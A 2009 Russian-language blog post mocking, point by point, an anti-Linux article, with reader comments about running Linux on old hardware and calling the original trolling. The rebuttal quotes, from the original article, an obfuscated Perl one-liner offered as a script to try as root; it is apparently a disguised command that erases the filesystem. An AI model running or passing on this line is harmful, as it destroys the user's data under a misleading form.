FAIL

Июль 8th, 2009 по SadKo Оставить ответ »

Статья:
хttp://stoplinux.org.ru/category/project/FAQ_why_Linux_suks.html
(UPD: на говнище прямых ссылок не даём)

Рецензия:

К примеру только в страшном сне дизайнер или архитектор может представить себе что его заставили использовать Linux. Вы простите в нормальном доме живете? А фильмы смотрите?
А вы любите пиксаровские мультики? Угадайте, на чём они отрендерены.
Весь Linux и OpenSource вместе взятые — это что то среднее между коммунистической утопией и сектой
О да, и мы тут сектанты все собрались. А как же расстрел дротиками портрета Торвальдса и рвание плюшевых пингвинов?
Куплю я к примеру тостер, принесу домой. Он не работает. Принесу обратно в магазин, а продавец-подросток мне начнет кричать «вы его не осииилили, вон там к нему инструкция в 5 томах, а ещё на коробке адрес интернет-форума написан!!!» Как вы думаете куда я этому продавцу этот тостер запихну?
Тут неверное сравнение: Linux надо сравнивать не с тостером, а с боевым самолётом. А Windows тогда — с игрушечным самолётиком на пульте управления.
Как только появились линуксоиды, появилось стремление с их стороны противопоставить себя окружающим. Задолго до Linux все было тихо и мирно. Были пользователи Mac, были пользователи Amiga, пользователи Windows и пользователи других систем.
А 50 лет назад были пользователи Unix. Тогда ни Windows, ни Mac и в помине не было. И жили все тихо, мирно.
Большая часть линуксоидов, кстати, держит у себя установленными сразу несколько дистрибутивов, что дополнительно накручивает счетчик в большую сторону.
Ага, то же самое можно сказать и про виндузятников. Ах да, Windows у нас не терпит соседей на компе.
Иными словами Linux может обеспечить только около 10% функциональности необходимой в реальной жизни.
А голая венда сколько функционала предоставит? Или до сих пор юзвери набирают документы в вордпаде, а рисуют в пейнте?
Примеров можно приводить сотни, начиная от избитого Photoshop, заканчивая написанием драйвера под новое устройство!
Photoshop — это не Windows, Windows — это не Photoshop. Photoshop есть и под Mac.
Простите, вы что, только ядро, внедрять собрались?! Почему как только линуксоидов начинают прижимать к стенке начинается отчаянная попытка подмены понятий?
Надо лучше учить терминологию. Почему люди вместо «карбонат кальция» говорят «мел»? Они тоже подменяют понятия?
Консоль не является интуитивно понятным интерфейсом.
Ещё какой понятный интерфейс! Всё интуитивно: я вижу курсор, значит надо вводить команду. Всё понятно: я вижу, что я печатаю, и зачем.
Реестр — сакс, конфиги рулят!
О да, о да. Ручная правка реестра и подстановка рандомных значений говорят обратное.
На самом деле Линуксоиды, пусть и с большой не охотой, но начинают признавать, что идея использования текстовых файлов для настройки системы в наше время изжила себя.
Эмм. Где надо, там будет графический конфигуратор. Я вот сейас пишу демона, который на основе XML строит схему обработки данных. Графический конфигуратор для этой системы аффтар статьи, будь и крутым программистом, будет писать несколько лет.
Вдобавок, в использование консоли заключается серьезная опасность. Попробуйте запустить следующий скрипт с правами root.

perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Ой, вот не надо дешёвых понтов. Заходим под администратором в венду, отключаем антивирусы и файерволлы, и пройдёмся по порно-сайтам. Полегчало?
В последние годы вообще появился ряд «антивирусов для Linux». И как это не удивительно они оказались востребованными!
О да, для фильтрации почты, впоследствии выкачиваемой Windows-машинами, а также проксирования html-кода сайтов.
«Бесплатное» продвижение — хитрая стратегия по зарабатыванию денег, на желающих халявы людях. Первая доза всегда бесплатно! Главное подсадить!
Труд оплачивается всегда. Отличие бизнес-модели Linux от Windows в том, что, написанное однажды становится (или нет — зависит от автора) достоянием общественности. А корпорация Microsoft просто занимается продажей байтов и воздуха.
Так же не путайте понятие воровство и незаконное использование чужой интеллектуальной собственности. Путанием понятий страдают не только линуксоиды но и правообладатели.
Ну так, может, автору статьи разобраться сначала с правообладателями, ОБЭПом и другими ассоциациями, а потом уже писать статью? Киньте камень тот, кто безгрешен.

Тогда вам остается только обратиться к врачу. У нормальных людей нет отупляющей идеологии.

Вы христианин? Мусульманин? Атеист? Тогда вам тоже к врачу.

Вспомните хотя бы MS-DOS 1.0 которая стоила в десять раз дешевле осей конкурентов!

Да, давайте вспомним про то, как Гейтс начал захватывать рынок за счёт демпингования и предустановки ПО на компьютеры (фактически, сговор с IBM). Он никогда не работал честно, не приветствовал здоровую конкуренцию. Не говоря Б, говорить А нехорошо.

«написание монолитного ядра в 1991 г. было «гигантским шагом назад в 1970-е годы» [8]. Автором этих строк является профессор Амстердамского университета Эндрю Таненбаум.

И? Где Linux, а где Minix? А что, в Windows ядро не монолитное? Почему, говоря о монолитном ядре, защитник Windows так ВНЕЗАПНО забывает о монолитности ядра этой чудесной мега-ос? Автор вообще что-нибудь слышал в последнее время о Minix? Я — две новости за 4 года, если не больше.

Вы сильно ошибаетесь если считаете, что Linux позволит вам сесть и разобраться как устроена Операционная Система. Судите сами: объем одного ядра 2.6.30 составляет более 65MB (!), а это около 70 тысяч страниц исходных кодов!

И? Исходники винды в студию, будем меряться мегабайтами! Видел я как-то архив неполной w2k, так там больше 100 метров было.

Урезаем конфиг до уровня Pentium 200Mhz с 64Mb оперативной памяти. Спорить что это старое железо будете? А теперь пытаемся поставить на него Linux.

Ок, урезаем конфиг и пробуем туда ставить Windows Vista. Удобно?

Как результат полученные продукты не имеют той отточенности и того качества, которое разработчики могли бы получить используй они другую систему.

Отточенность и качество прямиком зависят от кривизны рук разработчиков, а не о том, на базе чего строится решение.

В Linux всё появляется не вовремя, даже требуемый функционал.

А какой функционал нужен аффтару?

На домашнем компьютере простой пользователь так же является администратором. Само название ПК — Персональный Компьютер подразумевает, что работать и администрировать систему будет один человек

Враки. Я сисадмин только тогда, когда нужно новую софтину поставить или что-то серьёзное настроить.

Спустя несколько месяцев после своего заявления Столлман, на публике показал, что у него случился GPL-передоз. Так на конференции он снял ботинок с ноги, и начал что-то есть(!) со своей ноги (!) [20]. Вы, как нормальный человек, как к этому отнесетесь?

Тут Баллмер недавно чуть ли не нагишом на сцене бегал и чуть ли не козлом прыгал. Как вы к этому отнесётесь?

В случае коммерческих приложений и систем неотъемлемой частью предрелизной подготовки является многоуровневой тестирование, которое позволяет значительно снизить вероятность нахождения ошибки в стабильной версии продукта.

Ой не надо, знаю я как такие тестирования «только для галочки» делаются. Особенно в крупных корпорациях, когда наступает дедлайн.

На самом деле существует если не десятка, то как минимум пятерка интересных и по настоящему перспективных проектов[25].

Здесь я согласен. Но не помню, чтобы кто-то орал, что только линукс — это труъ.

Так, выбирая Linux, не забывайте что бесплатные дистрибутивы преследуют своей целью обманом вовлечь пользователей в процесс тестирование сырых продуктов с целью последующей продажи платных решений.

Кто обманывает? Вы сами выбираете дистрибутив, есть даже stable-ветки.

Местами мне кажется, что разработчики Linux просто издеваются над пользователями, иначе такое количество косяков и недоработок объяснить просто не возможно.

s/Linux/Windows/g = утверждение не становится ложным.

Мне надоело слышать про разные «вражеские» закладки в Windows. Параноикам постоянно кажется что за ними кто-то шпионит, ворует у них какие-то конфиденциальные сведения.

Тем не менее, есть уже документальные подтверждения не в пользу Microsoft.

Я потратил 7 лет на то, чтобы убедиться во всей бесперспективности данного ожидания. Как распоряжаться своим время решать вам. Лично я отказался от использования Linux.

Оно и видно.

Заключение о статье: КГ, ни к чему кроме разжигание холиваров не приводит
Заключение об авторе: АМ, захотел сумничать, не получилось.

Реклама

10 комментариев

  1. >Урезаем конфиг до уровня Pentium 200Mhz с 64Mb оперативной памяти. Спорить что это старое железо будете? А теперь пытаемся поставить на него Linux.

    ГГГЫГЫГГ, а мужики-то и незнали!!! Бедные бедные мы 340МГц MIPS 4Мб flash 16Мб RAM по производительности этот мипс без аппаратного деления/умножения FPU и прочих MMX до P1 200MMX как до шанхая пешком. И ничего 2.6.19.7 прекрасно там себя чувствует! И 2.6.30.1 тоже работало бы без проблем, но вот китайские кодоблобы не дают на него переехать ;(

    А теперь пусть аффффтаррр поставит на это железо винды? Слабо? А когда его любимый P200MMX рулил сетью на 200 абонентов считая траффик одновременно будучи файлопомойкой вэбсервером, DVB-S вещалкой радио и ещё не бог весть чем =)))

    P.S. У аффтара просто виндец головного мозга.

  2. >Я потратил 7 лет на то, чтобы убедиться во всей бесперспективности данного ожидания. Как распоряжаться своим время решать вам. Лично я отказался от использования Linux.

    А это просто убило и разорвало труп в клочья ;) 7мь лет убить и ничему не научиться, это действительно нужно уметь!!! Гениальный товарищь. Мне 8мь лет назад хватило насношаться с виндами так, чтобы более её не касаться ни в каком виде. А зачем его касаться? Оно и так дохлыми мышами воняет =)

  3. Интересно, он «Just for fun» действительно читал, или просто цитат из контекста понадёргал?

  4. Кстати, по некоторым фразам можно заключить, что человек совсем не разобрался в Linux. То, что «Я потратил 7 лет на то, чтобы убедиться во всей бесперспективности данного ожидания«, скорее всего говорит о том, что у него 7 лет простоял Linux, а в основном он пользовался виндой.

    Самая яркая фраза про антивирусы для Linux :-D

  5. Ну и зачем же пиарить это унылое говно? Чувак сделал скандальный сайт, понаставил там рекламы а мы ему помогаем трафик нагнать?

  6. Ничё-ничё. Помним, что случилось с linuxsuxx.org?

  7. >Урезаем конфиг до уровня Pentium 200Mhz с 64Mb оперативной памяти. Спорить что это старое железо будете? А теперь пытаемся поставить на него Linux.

    И ставил пару лет назад благополучненько: P1-233MHz ОЗУ 48Mb, дистр ASP Linux 9.0 ведро 2.4.20, кеды 3.5.Х (!!) — полет нормальный. Кеды конечно же для чего-то серьезного и ресурсоемкого (ООо, ФФ..) не подходят, но закпускаются и что-то простенькое можно делать под ними ;-) ) А ведь это не какой-то облеченный дистр специально для древних машин — и стал!! Причем дистр выпуска 2003 г. — помладше ХРшки. Думал что-то по-новее и еще легче поставить (типа DSL или DeLi) но пока и этот устраивает, все возлоденные задачи выполняет.

  8. Помоему автор идиот. Вообще не рубит в теме.

    И столько злости… А самое главное зачем ему это всё? Помоему он просто мудак. :-)

  9. Троллинг

    А по-моему,это просто троллинг.

  10. Re: Троллинг

    Однозначно. Учитывая ресурс, на котором был расположен оригинал :) .

Добавить комментарий

Blue Captcha Image
Refresh

*